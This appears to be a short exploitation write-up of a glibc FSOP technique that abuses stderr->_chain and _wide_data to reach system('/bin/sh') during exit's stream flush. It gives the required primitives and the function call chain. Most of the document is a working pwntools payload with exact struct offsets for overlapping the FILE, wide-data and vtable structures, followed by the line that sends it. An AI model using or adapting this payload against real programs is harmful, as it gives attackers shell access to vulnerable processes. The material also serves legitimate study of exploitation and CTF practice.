" _wide_data my beloved… "
This FSOP attack targets the _chain field of a stdio FILE structre.
It has the following requirements:
Libc leak 0xF0 sized writable location Address of where you are writing to Feel free to read the exploit along with the cradle that I used to learn this: fsop-4-noobz-1.zip .
Function chain TEXT
Copy
exit
-> __run_exit_handlers
-> _IO_cleanup
-> _IO_flush_all
-> _IO_wfile_oveflow
-> _IO_wdoallocbuf
-> _IO_WDOALLOCATE (fp)
=> system(fp)Optimisation This attack arranges the fields in such a way that the three necessary structs (struct _IO_FILE, struct _IO_wide_data, struct _IO_jumps_t) overlap while also meeting necessary constraints.
Exploit Write the address of writable buffer to stderr->_chain, and trigger
_IO_flush_all.
Write the below to the buffer:
PY Copy
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
fp_at = hbase + 0x400
# fmt: off
fp = {
# _IO_FILE
# -----------------------------
0 : b "a;/bin/sh \x00 " , # fp->_flags & _IO_NO_WRITE check in _IO_wdoallocbuf
192 : p32 ( 10 ), # mode, fp->_mode > 0
130 : p8 ( 0 ), # _vtable_offset, _IO_vtable_offset (fp) == 0
136 : libc . sym [ "_IO_stdfile_0_lock" ],
160 : fp_at , # _wide_data
216 : libc . sym [ "_IO_wfile_jumps" ], # <-- ADD THIS
# _IO_wide_data
# -----------------------------
# fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base
24 : 0 , # _IO_write_base
32 : 8 , # _IO_write_ptr
48 : 0 , # _IO_buf_base, fp->_wide_data->_IO_buf_base
224 : fp_at , # _wide_vtable
# _IO_wide_data->_wide_vtable
# -----------------------------
104 : libc . sym [ "system" ], # __doalloc
}
# fmt: on
fp = flat ( fp , length = 0xF0 , filler = " \x00 " )
bp ()
io . send ( fp )